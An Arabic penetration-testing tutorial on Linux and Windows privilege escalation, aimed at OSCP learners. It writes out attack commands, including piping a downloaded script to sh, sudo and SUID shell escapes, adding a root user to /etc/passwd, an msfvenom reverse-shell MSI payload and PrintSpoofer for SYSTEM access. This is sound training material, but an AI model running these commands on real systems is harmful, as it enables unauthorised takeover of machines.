رفع الصلاحيات في Linux وWindows — الدليل الشامل 2026
7 سبتمبر 2026 · بواسطة Pentevo
الوصول الأولي للنظام مجرد بداية. المختبر الحقيقي يحتاج الوصول الكامل — root في Linux أو SYSTEM في Windows. هنا تأتي مرحلة رفع الصلاحيات.
هذه المرحلة تفصل المبتدئين عن المحترفين. وهي واحدة من أصعب متطلبات امتحان OSCP.
رفع الصلاحيات في Linux
1. المسح الأولي — دائمًا ابدأ هنا
# معلومات النظام
uname -a
cat /etc/os-release
id
whoami
sudo -l # ماذا يمكنني تشغيله بصلاحية sudo؟
2. LinPEAS — الأداة الشاملة
LinPEAS (Linux Privilege Escalation Awesome Script) تفحص النظام بالكامل وتلوّن النتائج حسب الأولوية:
- 🔴 أحمر/أصفر = خطر عالٍ، ابحث هنا أولاً
- 🔵 أزرق = معلومات مفيدة
# تحميل وتشغيل
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
# أو نقله للهدف أولاً
wget http://YOUR_IP/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh | tee linpeas_output.txt
3. تقنيات Linux الشائعة
SUID Files
ملفات تعمل بصلاحية مالكها (عادةً root):
find / -perm -4000 2>/dev/null
ثم راجع GTFOBins (gtfobins.github.io) للبحث عن استغلال الملف المكتشف.
Sudo Misconfigurations
sudo -l
# إذا وجدت: (ALL) NOPASSWD: /usr/bin/vim
sudo vim -c ':!/bin/bash' # shell بصلاحية root
Cron Jobs
cat /etc/crontab
ls -la /etc/cron*
# ابحث عن سكريبتات يكتبها مستخدمك أو تملك أذونات ضعيفة
Writable /etc/passwd
ls -la /etc/passwd
# إذا كان قابلاً للكتابة:
echo 'hacker:$1$salt$hash:0:0:root:/root:/bin/bash' >> /etc/passwd
Kernel Exploits
uname -r
# ابحث عن: Linux Kernel < X.X.X exploit privilege escalation
searchsploit linux kernel 4.4
تحذير: Kernel exploits قد تعطّل النظام — استخدم بحذر في البيئات الحقيقية.
رفع الصلاحيات في Windows
1. المسح الأولي
whoami /priv
whoami /groups
net users
net localgroup administrators
systeminfo
2. WinPEAS — النظير لـ LinPEAS
# تنزيل وتشغيل
.\winPEASany.exe
# أو النسخة المضغوطة
.\winPEASany.exe quiet servicesinfo processinfo
3. تقنيات Windows الشائعة
Unquoted Service Paths
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """
إذا وجدت مسارًا غير محاط بعلامات اقتباس مثل:
C:\Program Files\My Service\service.exe
يمكنك وضع ملف في C:\Program.exe للتنفيذ بصلاحية SYSTEM.
AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
# إذا كلاهما = 1: اصنع MSI خبيثًا
msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP LPORT=PORT -f msi -o evil.msi
SeImpersonatePrivilege / SeAssignPrimaryTokenPrivilege
whoami /priv
# إذا ظهر SeImpersonatePrivilege: Enabled
استخدم PrintSpoofer أو GodPotato للوصول إلى SYSTEM:
.\PrintSpoofer64.exe -i -c cmd
Weak Service Permissions
# فحص صلاحيات الخدمات
Get-Acl HKLM:\SYSTEM\CurrentControlSet\Services\* | Format-List
GTFOBins — مرجعك السريع
gtfobins.github.io — قاعدة بيانات تجمع جميع ثنائيات Linux التي يمكن استغلالها لرفع الصلاحيات أو التهرب من القيود.
أمثلة سريعة:
find . -exec /bin/bash \;— إذا كانfindبـ SUIDpython3 -c 'import os; os.execl("/bin/bash", "bash", "-p")'— إذا كان python3 بـ SUIDvim -c ':!bash'— إذا كان vim مسموحًا بـ sudo
مسار تعلّم رفع الصلاحيات
| المرحلة | المورد |
|---|---|
| 1. الأساسيات | TryHackMe: "Linux PrivEsc" + "Windows PrivEsc" |
| 2. التطبيق | VulnHub: Kioptrix, Basic Pentesting |
| 3. المتوسط | HackTheBox: Beep, Nibbles, Bastard |
| 4. الاحتراف | OSCP PEN-200 |
تذكر: رفع الصلاحيات أساسه الإحصاء والتعداد (Enumeration). كلما جمعت معلومات أكثر، كلما وجدت الثغرة أسرع. LinPEAS وWinPEAS يوفران 80% من العمل — بقي عليك التحليل واتخاذ القرار.
تعمّق أكثر بزيارة أكاديمية Pentevo أو مراجعة دليل اختبار الاختراق الشامل.
الأسئلة الشائعة
ما هو رفع الصلاحيات؟
رفع الصلاحيات (Privilege Escalation) هو عملية الانتقال من صلاحيات محدودة (مستخدم عادي) إلى صلاحيات أعلى (root في Linux أو SYSTEM/Administrator في Windows) داخل نظام تم الوصول إليه.
ما الفرق بين Horizontal وVertical Privilege Escalation؟
Vertical: الانتقال لصلاحيات أعلى (مستخدم → root). Horizontal: الوصول لحساب مستخدم آخر بنفس المستوى (مستخدم A → مستخدم B) للوصول لبياناته.
هل LinPEAS آمن الاستخدام؟
LinPEAS سكريبت يجمع معلومات فقط ولا يعدّل النظام. آمن في بيئات الاختبار المرخّص. قد يُشغّل تنبيهات أمنية في الأنظمة الحقيقية لذا احرص على الإذن أولاً.
كيف أتعلم رفع الصلاحيات عملياً؟
أفضل المصادر: TryHackMe مسار 'Linux PrivEsc' و'Windows PrivEsc'، غرفة HackTheBox 'Nibbles' و'Beep'، وموقع GTFOBins.github.io للمرجع السريع.
مقالات ذات صلة
اختراق Active Directory — الدليل الكامل للمبتدئين 2026
شرح شامل لاختراق Active Directory: Kerberoasting وPass-the-Hash وBloodHound وGolden Ticket. الأدوات والتقنيات التي يحتاجها كل مختبر اختراق.
Toolsكسر كلمات المرور — الدليل الكامل: Hashcat وJohn the Ripper 2026
شرح شامل لكسر كلمات المرور في اختبار الاختراق: أنواع الهجمات، Hashcat، John the Ripper، Rainbow Tables، وكيف تحمي كلمات مرورك.
Toolsأدوات Kali Linux الأساسية للمبتدئين في 2026
تعلم أهم أدوات Kali Linux: nmap، Burp Suite، Metasploit، Wireshark، John the Ripper، وغيرها — شرح بالعربي مع أمثلة عملية.
Toolsأوامر Nmap: ورقة الغش العملية (2026)
أوامر Nmap التي ستستخدمها فعلًا — اكتشاف المضيفين، وفحص المنافذ، وكشف الخدمات ونظام التشغيل، والتوقيت، ومحرّك السكربتات NSE — مع أمثلة.
طبّق هذا عمليًا
أكاديمية Pentevo تحوّل هذه المفاهيم إلى دروس موجّهة وفيديوهات واختبارات — مجانًا.
ابدأ التعلّم مجانًا